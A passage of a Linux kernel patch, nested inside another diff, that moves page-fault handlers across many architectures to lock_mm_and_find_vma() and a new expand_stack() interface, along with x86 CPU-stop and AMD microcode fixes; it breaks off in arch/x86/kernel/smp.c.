++++ b/arch/hexagon/mm/vm_fault.c
+@@ -57,21 +57,10 @@ void do_page_fault(unsigned long address, long cause, struct pt_regs *regs)
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
+-	if (!vma)
+-		goto bad_area;
++	vma = lock_mm_and_find_vma(mm, address, regs);
++	if (unlikely(!vma))
++		goto bad_area_nosemaphore;
+ 
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-
+-	if (expand_stack(vma, address))
+-		goto bad_area;
+-
+-good_area:
+ 	/* Address space is OK.  Now check access rights. */
+ 	si_code = SEGV_ACCERR;
+ 
+@@ -140,6 +129,7 @@ good_area:
+ bad_area:
+ 	mmap_read_unlock(mm);
+ 
++bad_area_nosemaphore:
+ 	if (user_mode(regs)) {
+ 		force_sig_fault(SIGSEGV, si_code, (void __user *)address);
+ 		return;
+diff --git a/arch/ia64/mm/fault.c b/arch/ia64/mm/fault.c
+index ef78c2d66cdde..99a09abe1d2c5 100644
+--- a/arch/ia64/mm/fault.c
++++ b/arch/ia64/mm/fault.c
+@@ -110,10 +110,12 @@ retry:
+          * register backing store that needs to expand upwards, in
+          * this case vma will be null, but prev_vma will ne non-null
+          */
+-        if (( !vma && prev_vma ) || (address < vma->vm_start) )
+-		goto check_expansion;
++        if (( !vma && prev_vma ) || (address < vma->vm_start) ) {
++		vma = expand_stack(mm, address);
++		if (!vma)
++			goto bad_area_nosemaphore;
++	}
+ 
+-  good_area:
+ 	code = SEGV_ACCERR;
+ 
+ 	/* OK, we've got a good vm_area for this memory area.  Check the access permissions: */
+@@ -174,35 +176,9 @@ retry:
+ 	mmap_read_unlock(mm);
+ 	return;
+ 
+-  check_expansion:
+-	if (!(prev_vma && (prev_vma->vm_flags & VM_GROWSUP) && (address == prev_vma->vm_end))) {
+-		if (!vma)
+-			goto bad_area;
+-		if (!(vma->vm_flags & VM_GROWSDOWN))
+-			goto bad_area;
+-		if (REGION_NUMBER(address) != REGION_NUMBER(vma->vm_start)
+-		    || REGION_OFFSET(address) >= RGN_MAP_LIMIT)
+-			goto bad_area;
+-		if (expand_stack(vma, address))
+-			goto bad_area;
+-	} else {
+-		vma = prev_vma;
+-		if (REGION_NUMBER(address) != REGION_NUMBER(vma->vm_start)
+-		    || REGION_OFFSET(address) >= RGN_MAP_LIMIT)
+-			goto bad_area;
+-		/*
+-		 * Since the register backing store is accessed sequentially,
+-		 * we disallow growing it by more than a page at a time.
+-		 */
+-		if (address > vma->vm_end + PAGE_SIZE - sizeof(long))
+-			goto bad_area;
+-		if (expand_upwards(vma, address))
+-			goto bad_area;
+-	}
+-	goto good_area;
+-
+   bad_area:
+ 	mmap_read_unlock(mm);
++  bad_area_nosemaphore:
+ 	if ((isr & IA64_ISR_SP)
+ 	    || ((isr & IA64_ISR_NA) && (isr & IA64_ISR_CODE_MASK) == IA64_ISR_CODE_LFETCH))
+ 	{
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index 903096bd87f88..51d738ac12e55 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -107,6 +107,7 @@ config LOONGARCH
+ 	select HAVE_VIRT_CPU_ACCOUNTING_GEN if !SMP
+ 	select IRQ_FORCED_THREADING
+ 	select IRQ_LOONGARCH_CPU
++	select LOCK_MM_AND_FIND_VMA
+ 	select MMU_GATHER_MERGE_VMAS if MMU
+ 	select MODULES_USE_ELF_RELA if MODULES
+ 	select NEED_PER_CPU_EMBED_FIRST_CHUNK
+diff --git a/arch/loongarch/mm/fault.c b/arch/loongarch/mm/fault.c
+index 1ccd53655cab0..b829ab911a17b 100644
+--- a/arch/loongarch/mm/fault.c
++++ b/arch/loongarch/mm/fault.c
+@@ -166,22 +166,18 @@ static void __kprobes __do_page_fault(struct pt_regs *regs,
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
+-	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (!expand_stack(vma, address))
+-		goto good_area;
++	vma = lock_mm_and_find_vma(mm, address, regs);
++	if (unlikely(!vma))
++		goto bad_area_nosemaphore;
++	goto good_area;
++
+ /*
+  * Something tried to access memory that isn't in our memory map..
+  * Fix it, but check if it's kernel or user first..
+  */
+ bad_area:
+ 	mmap_read_unlock(mm);
++bad_area_nosemaphore:
+ 	do_sigsegv(regs, write, address, si_code);
+ 	return;
+ 
+diff --git a/arch/m68k/mm/fault.c b/arch/m68k/mm/fault.c
+index 4d2837eb3e2a3..6f62af8e293a0 100644
+--- a/arch/m68k/mm/fault.c
++++ b/arch/m68k/mm/fault.c
+@@ -105,8 +105,9 @@ retry:
+ 		if (address + 256 < rdusp())
+ 			goto map_err;
+ 	}
+-	if (expand_stack(vma, address))
+-		goto map_err;
++	vma = expand_stack(mm, address);
++	if (!vma)
++		goto map_err_nosemaphore;
+ 
+ /*
+  * Ok, we have a good vm_area for this memory access, so
+@@ -193,10 +194,12 @@ bus_err:
+ 	goto send_sig;
+ 
+ map_err:
++	mmap_read_unlock(mm);
++map_err_nosemaphore:
+ 	current->thread.signo = SIGSEGV;
+ 	current->thread.code = SEGV_MAPERR;
+ 	current->thread.faddr = address;
+-	goto send_sig;
++	return send_fault_sig(regs);
+ 
+ acc_err:
+ 	current->thread.signo = SIGSEGV;
+diff --git a/arch/microblaze/mm/fault.c b/arch/microblaze/mm/fault.c
+index 5c40c3ebe52f7..a409bb3f09f7f 100644
+--- a/arch/microblaze/mm/fault.c
++++ b/arch/microblaze/mm/fault.c
+@@ -192,8 +192,9 @@ retry:
+ 			&& (kernel_mode(regs) || !store_updates_sp(regs)))
+ 				goto bad_area;
+ 	}
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++	vma = expand_stack(mm, address);
++	if (!vma)
++		goto bad_area_nosemaphore;
+ 
+ good_area:
+ 	code = SEGV_ACCERR;
+diff --git a/arch/mips/Kconfig b/arch/mips/Kconfig
+index 2f5835e300a8f..7b0856c76c9ad 100644
+--- a/arch/mips/Kconfig
++++ b/arch/mips/Kconfig
+@@ -94,6 +94,7 @@ config MIPS
+ 	select HAVE_VIRT_CPU_ACCOUNTING_GEN if 64BIT || !SMP
+ 	select IRQ_FORCED_THREADING
+ 	select ISA if EISA
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_REL if MODULES
+ 	select MODULES_USE_ELF_RELA if MODULES && 64BIT
+ 	select PERF_USE_VMALLOC
+diff --git a/arch/mips/mm/fault.c b/arch/mips/mm/fault.c
+index a27045f5a556d..d7878208bd3fa 100644
+--- a/arch/mips/mm/fault.c
++++ b/arch/mips/mm/fault.c
+@@ -99,21 +99,13 @@ static void __do_page_fault(struct pt_regs *regs, unsigned long write,
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++		goto bad_area_nosemaphore;
+ /*
+  * Ok, we have a good vm_area for this memory access, so
+  * we can handle it..
+  */
+-good_area:
+ 	si_code = SEGV_ACCERR;
+ 
+ 	if (write) {
+diff --git a/arch/nios2/Kconfig b/arch/nios2/Kconfig
+index a582f72104f39..1fb78865a4593 100644
+--- a/arch/nios2/Kconfig
++++ b/arch/nios2/Kconfig
+@@ -16,6 +16,7 @@ config NIOS2
+ 	select HAVE_ARCH_TRACEHOOK
+ 	select HAVE_ARCH_KGDB
+ 	select IRQ_DOMAIN
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select OF
+ 	select OF_EARLY_FLATTREE
+diff --git a/arch/nios2/mm/fault.c b/arch/nios2/mm/fault.c
+index edaca0a6c1c1c..71939fb28c2e7 100644
+--- a/arch/nios2/mm/fault.c
++++ b/arch/nios2/mm/fault.c
+@@ -86,27 +86,14 @@ asmlinkage void do_page_fault(struct pt_regs *regs, unsigned long cause,
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ 
+-	if (!mmap_read_trylock(mm)) {
+-		if (!user_mode(regs) && !search_exception_tables(regs->ea))
+-			goto bad_area_nosemaphore;
+ retry:
+-		mmap_read_lock(mm);
+-	}
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++		goto bad_area_nosemaphore;
+ /*
+  * Ok, we have a good vm_area for this memory access, so
+  * we can handle it..
+  */
+-good_area:
+ 	code = SEGV_ACCERR;
+ 
+ 	switch (cause) {
+diff --git a/arch/openrisc/mm/fault.c b/arch/openrisc/mm/fault.c
+index b4762d66e9efe..e3ad46d02fbdd 100644
+--- a/arch/openrisc/mm/fault.c
++++ b/arch/openrisc/mm/fault.c
+@@ -127,8 +127,9 @@ retry:
+ 		if (address + PAGE_SIZE < regs->sp)
+ 			goto bad_area;
+ 	}
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++	vma = expand_stack(mm, address);
++	if (!vma)
++		goto bad_area_nosemaphore;
+ 
+ 	/*
+ 	 * Ok, we have a good vm_area for this memory access, so
+diff --git a/arch/parisc/mm/fault.c b/arch/parisc/mm/fault.c
+index 869204e97ec9d..b00aa98b582c2 100644
+--- a/arch/parisc/mm/fault.c
++++ b/arch/parisc/mm/fault.c
+@@ -288,15 +288,19 @@ void do_page_fault(struct pt_regs *regs, unsigned long code,
+ retry:
+ 	mmap_read_lock(mm);
+ 	vma = find_vma_prev(mm, address, &prev_vma);
+-	if (!vma || address < vma->vm_start)
+-		goto check_expansion;
++	if (!vma || address < vma->vm_start) {
++		if (!prev_vma || !(prev_vma->vm_flags & VM_GROWSUP))
++			goto bad_area;
++		vma = expand_stack(mm, address);
++		if (!vma)
++			goto bad_area_nosemaphore;
++	}
++
+ /*
+  * Ok, we have a good vm_area for this memory access. We still need to
+  * check the access permissions.
+  */
+ 
+-good_area:
+-
+ 	if ((vma->vm_flags & acc_type) != acc_type)
+ 		goto bad_area;
+ 
+@@ -342,17 +346,13 @@ good_area:
+ 	mmap_read_unlock(mm);
+ 	return;
+ 
+-check_expansion:
+-	vma = prev_vma;
+-	if (vma && (expand_stack(vma, address) == 0))
+-		goto good_area;
+-
+ /*
+  * Something tried to access memory that isn't in our memory map..
+  */
+ bad_area:
+ 	mmap_read_unlock(mm);
+ 
++bad_area_nosemaphore:
+ 	if (user_mode(regs)) {
+ 		int signo, si_code;
+ 
+@@ -444,7 +444,7 @@ handle_nadtlb_fault(struct pt_regs *regs)
+ {
+ 	unsigned long insn = regs->iir;
+ 	int breg, treg, xreg, val = 0;
+-	struct vm_area_struct *vma, *prev_vma;
++	struct vm_area_struct *vma;
+ 	struct task_struct *tsk;
+ 	struct mm_struct *mm;
+ 	unsigned long address;
+@@ -480,7 +480,7 @@ handle_nadtlb_fault(struct pt_regs *regs)
+ 				/* Search for VMA */
+ 				address = regs->ior;
+ 				mmap_read_lock(mm);
+-				vma = find_vma_prev(mm, address, &prev_vma);
++				vma = vma_lookup(mm, address);
+ 				mmap_read_unlock(mm);
+ 
+ 				/*
+@@ -489,7 +489,6 @@ handle_nadtlb_fault(struct pt_regs *regs)
+ 				 */
+ 				acc_type = (insn & 0x40) ? VM_WRITE : VM_READ;
+ 				if (vma
+-				    && address >= vma->vm_start
+ 				    && (vma->vm_flags & acc_type) == acc_type)
+ 					val = 1;
+ 			}
+diff --git a/arch/powerpc/Kconfig b/arch/powerpc/Kconfig
+index 2b1141645d9e1..6050e6e10d321 100644
+--- a/arch/powerpc/Kconfig
++++ b/arch/powerpc/Kconfig
+@@ -257,6 +257,7 @@ config PPC
+ 	select IRQ_DOMAIN
+ 	select IRQ_FORCED_THREADING
+ 	select KASAN_VMALLOC			if KASAN && MODULES
++	select LOCK_MM_AND_FIND_VMA
+ 	select MMU_GATHER_PAGE_SIZE
+ 	select MMU_GATHER_RCU_TABLE_FREE
+ 	select MMU_GATHER_MERGE_VMAS
+diff --git a/arch/powerpc/mm/copro_fault.c b/arch/powerpc/mm/copro_fault.c
+index 7c507fb48182b..f49fd873df8da 100644
+--- a/arch/powerpc/mm/copro_fault.c
++++ b/arch/powerpc/mm/copro_fault.c
+@@ -33,19 +33,11 @@ int copro_handle_mm_fault(struct mm_struct *mm, unsigned long ea,
+ 	if (mm->pgd == NULL)
+ 		return -EFAULT;
+ 
+-	mmap_read_lock(mm);
+-	ret = -EFAULT;
+-	vma = find_vma(mm, ea);
++	vma = lock_mm_and_find_vma(mm, ea, NULL);
+ 	if (!vma)
+-		goto out_unlock;
+-
+-	if (ea < vma->vm_start) {
+-		if (!(vma->vm_flags & VM_GROWSDOWN))
+-			goto out_unlock;
+-		if (expand_stack(vma, ea))
+-			goto out_unlock;
+-	}
++		return -EFAULT;
+ 
++	ret = -EFAULT;
+ 	is_write = dsisr & DSISR_ISSTORE;
+ 	if (is_write) {
+ 		if (!(vma->vm_flags & VM_WRITE))
+diff --git a/arch/powerpc/mm/fault.c b/arch/powerpc/mm/fault.c
+index af46aa88422bf..644e4ec6ce99d 100644
+--- a/arch/powerpc/mm/fault.c
++++ b/arch/powerpc/mm/fault.c
+@@ -84,11 +84,6 @@ static int __bad_area(struct pt_regs *regs, unsigned long address, int si_code)
+ 	return __bad_area_nosemaphore(regs, address, si_code);
+ }
+ 
+-static noinline int bad_area(struct pt_regs *regs, unsigned long address)
+-{
+-	return __bad_area(regs, address, SEGV_MAPERR);
+-}
+-
+ static noinline int bad_access_pkey(struct pt_regs *regs, unsigned long address,
+ 				    struct vm_area_struct *vma)
+ {
+@@ -481,40 +476,12 @@ static int ___do_page_fault(struct pt_regs *regs, unsigned long address,
+ 	 * we will deadlock attempting to validate the fault against the
+ 	 * address space.  Luckily the kernel only validly references user
+ 	 * space from well defined areas of code, which are listed in the
+-	 * exceptions table.
+-	 *
+-	 * As the vast majority of faults will be valid we will only perform
+-	 * the source reference check when there is a possibility of a deadlock.
+-	 * Attempt to lock the address space, if we cannot we then validate the
+-	 * source.  If this is invalid we can skip the address space check,
+-	 * thus avoiding the deadlock.
++	 * exceptions table. lock_mm_and_find_vma() handles that logic.
+ 	 */
+-	if (unlikely(!mmap_read_trylock(mm))) {
+-		if (!is_user && !search_exception_tables(regs->nip))
+-			return bad_area_nosemaphore(regs, address);
+-
+ retry:
+-		mmap_read_lock(mm);
+-	} else {
+-		/*
+-		 * The above down_read_trylock() might have succeeded in
+-		 * which case we'll have missed the might_sleep() from
+-		 * down_read():
+-		 */
+-		might_sleep();
+-	}
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (unlikely(!vma))
+-		return bad_area(regs, address);
+-
+-	if (unlikely(vma->vm_start > address)) {
+-		if (unlikely(!(vma->vm_flags & VM_GROWSDOWN)))
+-			return bad_area(regs, address);
+-
+-		if (unlikely(expand_stack(vma, address)))
+-			return bad_area(regs, address);
+-	}
++		return bad_area_nosemaphore(regs, address);
+ 
+ 	if (unlikely(access_pkey_error(is_write, is_exec,
+ 				       (error_code & DSISR_KEYFAULT), vma)))
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index a85bbe28dcf46..6bf8dc0b8f935 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -114,6 +114,7 @@ config RISCV
+ 	select HAVE_RSEQ
+ 	select IRQ_DOMAIN
+ 	select IRQ_FORCED_THREADING
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA if MODULES
+ 	select MODULE_SECTIONS if MODULES
+ 	select OF
+diff --git a/arch/riscv/mm/fault.c b/arch/riscv/mm/fault.c
+index eb0774d9c03b1..274bc6dd839fa 100644
+--- a/arch/riscv/mm/fault.c
++++ b/arch/riscv/mm/fault.c
+@@ -83,13 +83,13 @@ static inline void mm_fault_error(struct pt_regs *regs, unsigned long addr, vm_f
+ 	BUG();
+ }
+ 
+-static inline void bad_area(struct pt_regs *regs, struct mm_struct *mm, int code, unsigned long addr)
++static inline void
++bad_area_nosemaphore(struct pt_regs *regs, int code, unsigned long addr)
+ {
+ 	/*
+ 	 * Something tried to access memory that isn't in our memory map.
+ 	 * Fix it, but check if it's kernel or user first.
+ 	 */
+-	mmap_read_unlock(mm);
+ 	/* User mode accesses just cause a SIGSEGV */
+ 	if (user_mode(regs)) {
+ 		do_trap(regs, SIGSEGV, code, addr);
+@@ -99,6 +99,15 @@ static inline void bad_area(struct pt_regs *regs, struct mm_struct *mm, int code
+ 	no_context(regs, addr);
+ }
+ 
++static inline void
++bad_area(struct pt_regs *regs, struct mm_struct *mm, int code,
++	 unsigned long addr)
++{
++	mmap_read_unlock(mm);
++
++	bad_area_nosemaphore(regs, code, addr);
++}
++
+ static inline void vmalloc_fault(struct pt_regs *regs, int code, unsigned long addr)
+ {
+ 	pgd_t *pgd, *pgd_k;
+@@ -281,23 +290,10 @@ asmlinkage void do_page_fault(struct pt_regs *regs)
+ 	else if (cause == EXC_INST_PAGE_FAULT)
+ 		flags |= FAULT_FLAG_INSTRUCTION;
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, addr);
++	vma = lock_mm_and_find_vma(mm, addr, regs);
+ 	if (unlikely(!vma)) {
+ 		tsk->thread.bad_cause = cause;
+-		bad_area(regs, mm, code, addr);
+-		return;
+-	}
+-	if (likely(vma->vm_start <= addr))
+-		goto good_area;
+-	if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) {
+-		tsk->thread.bad_cause = cause;
+-		bad_area(regs, mm, code, addr);
+-		return;
+-	}
+-	if (unlikely(expand_stack(vma, addr))) {
+-		tsk->thread.bad_cause = cause;
+-		bad_area(regs, mm, code, addr);
++		bad_area_nosemaphore(regs, code, addr);
+ 		return;
+ 	}
+ 
+@@ -305,7 +301,6 @@ retry:
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it.
+ 	 */
+-good_area:
+ 	code = SEGV_ACCERR;
+ 
+ 	if (unlikely(access_error(cause, vma))) {
+diff --git a/arch/s390/mm/fault.c b/arch/s390/mm/fault.c
+index 8e84ed2bb944e..2ab388179833e 100644
+--- a/arch/s390/mm/fault.c
++++ b/arch/s390/mm/fault.c
+@@ -429,8 +429,9 @@ retry:
+ 	if (unlikely(vma->vm_start > address)) {
+ 		if (!(vma->vm_flags & VM_GROWSDOWN))
+ 			goto out_up;
+-		if (expand_stack(vma, address))
+-			goto out_up;
++		vma = expand_stack(mm, address);
++		if (!vma)
++			goto out;
+ 	}
+ 
+ 	/*
+diff --git a/arch/sh/Kconfig b/arch/sh/Kconfig
+index 5f220e903e5ab..8e4d1f757bcc9 100644
+--- a/arch/sh/Kconfig
++++ b/arch/sh/Kconfig
+@@ -56,6 +56,7 @@ config SUPERH
+ 	select HAVE_STACKPROTECTOR
+ 	select HAVE_SYSCALL_TRACEPOINTS
+ 	select IRQ_FORCED_THREADING
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select NEED_SG_DMA_LENGTH
+ 	select NO_DMA if !MMU && !DMA_COHERENT
+diff --git a/arch/sh/mm/fault.c b/arch/sh/mm/fault.c
+index acd2f5e50bfcd..06e6b49529245 100644
+--- a/arch/sh/mm/fault.c
++++ b/arch/sh/mm/fault.c
+@@ -439,21 +439,9 @@ asmlinkage void __kprobes do_page_fault(struct pt_regs *regs,
+ 	}
+ 
+ retry:
+-	mmap_read_lock(mm);
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (unlikely(!vma)) {
+-		bad_area(regs, error_code, address);
+-		return;
+-	}
+-	if (likely(vma->vm_start <= address))
+-		goto good_area;
+-	if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) {
+-		bad_area(regs, error_code, address);
+-		return;
+-	}
+-	if (unlikely(expand_stack(vma, address))) {
+-		bad_area(regs, error_code, address);
++		bad_area_nosemaphore(regs, error_code, address);
+ 		return;
+ 	}
+ 
+@@ -461,7 +449,6 @@ retry:
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it..
+ 	 */
+-good_area:
+ 	if (unlikely(access_error(error_code, vma))) {
+ 		bad_area_access_error(regs, error_code, address);
+ 		return;
+diff --git a/arch/sparc/Kconfig b/arch/sparc/Kconfig
+index 84437a4c65454..dbb1760cbe8c9 100644
+--- a/arch/sparc/Kconfig
++++ b/arch/sparc/Kconfig
+@@ -56,6 +56,7 @@ config SPARC32
+ 	select DMA_DIRECT_REMAP
+ 	select GENERIC_ATOMIC64
+ 	select HAVE_UID16
++	select LOCK_MM_AND_FIND_VMA
+ 	select OLD_SIGACTION
+ 	select ZONE_DMA
+ 
+diff --git a/arch/sparc/mm/fault_32.c b/arch/sparc/mm/fault_32.c
+index 91259f291c540..56eb40d385a82 100644
+--- a/arch/sparc/mm/fault_32.c
++++ b/arch/sparc/mm/fault_32.c
+@@ -143,28 +143,19 @@ asmlinkage void do_sparc_fault(struct pt_regs *regs, int text_fault, int write,
+ 	if (pagefault_disabled() || !mm)
+ 		goto no_context;
+ 
++	if (!from_user && address >= PAGE_OFFSET)
++		goto no_context;
++
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ 
+ retry:
+-	mmap_read_lock(mm);
+-
+-	if (!from_user && address >= PAGE_OFFSET)
+-		goto bad_area;
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++		goto bad_area_nosemaphore;
+ 	/*
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it..
+ 	 */
+-good_area:
+ 	code = SEGV_ACCERR;
+ 	if (write) {
+ 		if (!(vma->vm_flags & VM_WRITE))
+@@ -318,17 +309,9 @@ static void force_user_fault(unsigned long address, int write)
+ 
+ 	code = SEGV_MAPERR;
+ 
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, NULL);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
+-good_area:
++		goto bad_area_nosemaphore;
+ 	code = SEGV_ACCERR;
+ 	if (write) {
+ 		if (!(vma->vm_flags & VM_WRITE))
+@@ -347,6 +330,7 @@ good_area:
+ 	return;
+ bad_area:
+ 	mmap_read_unlock(mm);
++bad_area_nosemaphore:
+ 	__do_fault_siginfo(code, SIGSEGV, tsk->thread.kregs, address);
+ 	return;
+ 
+diff --git a/arch/sparc/mm/fault_64.c b/arch/sparc/mm/fault_64.c
+index 4acc12eafbf54..df685a2418550 100644
+--- a/arch/sparc/mm/fault_64.c
++++ b/arch/sparc/mm/fault_64.c
+@@ -383,8 +383,9 @@ continue_fault:
+ 				goto bad_area;
+ 		}
+ 	}
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++	vma = expand_stack(mm, address);
++	if (!vma)
++		goto bad_area_nosemaphore;
+ 	/*
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it..
+@@ -482,8 +483,9 @@ exit_exception:
+ 	 * Fix it, but check if it's kernel or user first..
+ 	 */
+ bad_area:
+-	insn = get_fault_insn(regs, insn);
+ 	mmap_read_unlock(mm);
++bad_area_nosemaphore:
++	insn = get_fault_insn(regs, insn);
+ 
+ handle_kernel_fault:
+ 	do_kernel_fault(regs, si_code, fault_code, insn, address);
+diff --git a/arch/um/kernel/trap.c b/arch/um/kernel/trap.c
+index d3ce21c4ca32a..6d8ae86ae978f 100644
+--- a/arch/um/kernel/trap.c
++++ b/arch/um/kernel/trap.c
+@@ -47,14 +47,15 @@ retry:
+ 	vma = find_vma(mm, address);
+ 	if (!vma)
+ 		goto out;
+-	else if (vma->vm_start <= address)
++	if (vma->vm_start <= address)
+ 		goto good_area;
+-	else if (!(vma->vm_flags & VM_GROWSDOWN))
++	if (!(vma->vm_flags & VM_GROWSDOWN))
+ 		goto out;
+-	else if (is_user && !ARCH_IS_STACKGROW(address))
+-		goto out;
+-	else if (expand_stack(vma, address))
++	if (is_user && !ARCH_IS_STACKGROW(address))
+ 		goto out;
++	vma = expand_stack(mm, address);
++	if (!vma)
++		goto out_nosemaphore;
+ 
+ good_area:
+ 	*code_out = SEGV_ACCERR;
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index b2c0fce3f257c..b3d5706579d43 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -271,6 +271,7 @@ config X86
+ 	select HAVE_GENERIC_VDSO
+ 	select HOTPLUG_SMT			if SMP
+ 	select IRQ_FORCED_THREADING
++	select LOCK_MM_AND_FIND_VMA
+ 	select NEED_PER_CPU_EMBED_FIRST_CHUNK
+ 	select NEED_PER_CPU_PAGE_FIRST_CHUNK
+ 	select NEED_SG_DMA_LENGTH
+diff --git a/arch/x86/include/asm/cpu.h b/arch/x86/include/asm/cpu.h
+index b472ef76826ad..37639a2d9c34f 100644
+--- a/arch/x86/include/asm/cpu.h
++++ b/arch/x86/include/asm/cpu.h
+@@ -96,4 +96,6 @@ static inline bool intel_cpu_signatures_match(unsigned int s1, unsigned int p1,
+ 
+ extern u64 x86_read_arch_cap_msr(void);
+ 
++extern struct cpumask cpus_stop_mask;
++
+ #endif /* _ASM_X86_CPU_H */
+diff --git a/arch/x86/include/asm/smp.h b/arch/x86/include/asm/smp.h
+index a73bced40e241..b3b34032ef234 100644
+--- a/arch/x86/include/asm/smp.h
++++ b/arch/x86/include/asm/smp.h
+@@ -132,6 +132,8 @@ void wbinvd_on_cpu(int cpu);
+ int wbinvd_on_all_cpus(void);
+ void cond_wakeup_cpu0(void);
+ 
++void smp_kick_mwait_play_dead(void);
++
+ void native_smp_send_reschedule(int cpu);
+ void native_send_call_func_ipi(const struct cpumask *mask);
+ void native_send_call_func_single_ipi(int cpu);
+diff --git a/arch/x86/kernel/cpu/microcode/amd.c b/arch/x86/kernel/cpu/microcode/amd.c
+index 461e45d85add9..9a3092ec9b274 100644
+--- a/arch/x86/kernel/cpu/microcode/amd.c
++++ b/arch/x86/kernel/cpu/microcode/amd.c
+@@ -705,7 +705,7 @@ static enum ucode_state apply_microcode_amd(int cpu)
+ 	rdmsr(MSR_AMD64_PATCH_LEVEL, rev, dummy);
+ 
+ 	/* need to apply patch? */
+-	if (rev >= mc_amd->hdr.patch_id) {
++	if (rev > mc_amd->hdr.patch_id) {
+ 		ret = UCODE_OK;
+ 		goto out;
+ 	}
+diff --git a/arch/x86/kernel/process.c b/arch/x86/kernel/process.c
+index e436c9c1ef3b3..279b5e9be80fc 100644
+--- a/arch/x86/kernel/process.c
++++ b/arch/x86/kernel/process.c
+@@ -744,15 +744,26 @@ bool xen_set_default_idle(void)
+ }
+ #endif
+ 
++struct cpumask cpus_stop_mask;
++
+ void __noreturn stop_this_cpu(void *dummy)
+ {
++	struct cpuinfo_x86 *c = this_cpu_ptr(&cpu_info);
++	unsigned int cpu = smp_processor_id();
++
+ 	local_irq_disable();
++
+ 	/*
+-	 * Remove this CPU:
++	 * Remove this CPU from the online mask and disable it
++	 * unconditionally. This might be redundant in case that the reboot
++	 * vector was handled late and stop_other_cpus() sent an NMI.
++	 *
++	 * According to SDM and APM NMIs can be accepted even after soft
++	 * disabling the local APIC.
+ 	 */
+-	set_cpu_online(smp_processor_id(), false);
++	set_cpu_online(cpu, false);
+ 	disable_local_APIC();
+-	mcheck_cpu_clear(this_cpu_ptr(&cpu_info));
++	mcheck_cpu_clear(c);
+ 
+ 	/*
+ 	 * Use wbinvd on processors that support SME. This provides support
+@@ -766,8 +777,17 @@ void __noreturn stop_this_cpu(void *dummy)
+ 	 * Test the CPUID bit directly because the machine might've cleared
+ 	 * X86_FEATURE_SME due to cmdline options.
+ 	 */
+-	if (cpuid_eax(0x8000001f) & BIT(0))
++	if (c->extended_cpuid_level >= 0x8000001f && (cpuid_eax(0x8000001f) & BIT(0)))
+ 		native_wbinvd();
++
++	/*
++	 * This brings a cache line back and dirties it, but
++	 * native_stop_other_cpus() will overwrite cpus_stop_mask after it
++	 * observed that all CPUs reported stop. This write will invalidate
++	 * the related cache line on this CPU.
++	 */
++	cpumask_clear_cpu(cpu, &cpus_stop_mask);
++
+ 	for (;;) {
+ 		/*
+ 		 * Use native_halt() so that memory contents don't change
+diff --git a/arch/x86/kernel/smp.c b/arch/x86/kernel/smp.c
+index 375b33ecafa27..174d6232b87fd 100644
+--- a/arch/x86/kernel/smp.c
++++ b/arch/x86/kernel/smp.c
+@@ -21,12 +21,14 @@
+ #include <linux/interrupt.h>
